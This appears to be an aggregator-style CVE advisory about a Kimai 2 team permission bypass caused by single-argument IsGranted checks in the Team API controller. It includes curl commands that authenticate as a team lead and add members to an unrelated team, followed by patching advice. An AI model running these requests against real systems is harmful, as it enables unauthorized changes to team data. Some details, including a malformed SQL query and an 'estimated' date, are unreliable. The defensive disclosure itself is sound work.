Listen to this Post
How the CVE works:
The vulnerability stems from incorrect use of Symfony’s `
` attribute in Team API endpoints. Instead of passing two arguments – the permission (<code>'edit'</code>) and the subject (<code>'team'</code>) – the code passes only a single argument (<code>'edit_team'</code>). This single-argument form causes Symfony’s `TeamVoter` to abort because its `supportsAttribute()` method only handles <code>'view'</code>, <code>'edit'</code>, and <code>'delete'</code>. Consequently, the voter never performs entity-level ownership checks. Only the `RolePermissionVoter` fires, which merely verifies that the user has the role‑level `edit_team` permission. As a result, any user holding `edit_team` can modify any team’s members, customers, projects, and activities, regardless of whether they are a member or leader of that team. All eight endpoints in `src/API/TeamController.php` (lines 177,201,229,252,275,298,321,339) are affected. The web controller (<code>src/Controller/TeamController.php:118</code>) is safe because it correctly uses two arguments. The flaw becomes exploitable only when an administrator grants `edit_team` to a low‑privilege role (e.g., <code>ROLE_TEAMLEAD</code>) via the permissions UI. In the default configuration only <code>ROLE_ADMIN</code>/<code>ROLE_SUPER_ADMIN</code> have <code>edit_team</code>, both already having full data access, making the missing check redundant. Pre‑2.54.0 versions are vulnerable.
<h2 style="color: blue;">dailycve form:</h2>
Platform: Symfony/Kimai 2
Version: before 2.54.0
Vulnerability: Team permission bypass
Severity: Medium
date: 2024-02-15 (estimated disclosure)
<h2 style="color: blue;">Prediction: 2024-03-01 (patch 2.54.0)</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
[bash]
List vulnerable endpoints (TeamController.php lines)
grep -n "IsGranted('edit_team')" src/API/TeamController.php
Extract all API routes for team associations
curl -X GET https://TARGET/api/teams/1/members \
-H "Authorization: Bearer $TOKEN"
Check role permissions (requires DB access)
mysql -u user -p -e "SELECT FROM user_roles WHERE role='ROLE_TEAMLEAD';"
Simulate exploit payload
curl -X POST https://TARGET/api/teams/2/members/5 \
-H "Authorization: Bearer $LOW_PRIV_TOKEN" \
-d '{"role":"ROLE_MEMBER"}'
Exploit:
Authenticate as user with edit_team (e.g., ROLE_TEAMLEAD)
TOKEN=$(curl -s -X POST https://TARGET/api/authenticate \
-d '{"username":"teamlead","password":"pass"}' | jq -r '.token')
Add user 3 to team 1 (teamlead does NOT belong to team 1)
curl -X POST https://TARGET/api/teams/1/members/3 \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json"
Expected: 403 Forbidden → Actual: 200 OK (vulnerable)
Protection from this CVE:
- Upgrade to Kimai 2.54.0 or later.
- If patching impossible, replace `[IsGranted(‘edit_team’)]` with `[IsGranted(‘edit’, ‘team’)]` in all eight API endpoints.
- Remove `edit_team` permission from all non‑admin roles via permissions UI.
- Implement a custom voter that rejects single‑argument `edit_team` attributes.
Impact:
A user granted the `edit_team` permission (e.g., a team lead) can arbitrarily modify any team’s membership, customer assignments, project assignments, and activity assignments. This leads to unauthorized data access, privilege escalation, and potential business disruption. In default configuration, no impact because only full admins have edit_team. However, any custom role with `edit_team` becomes a vector for complete team‑level compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

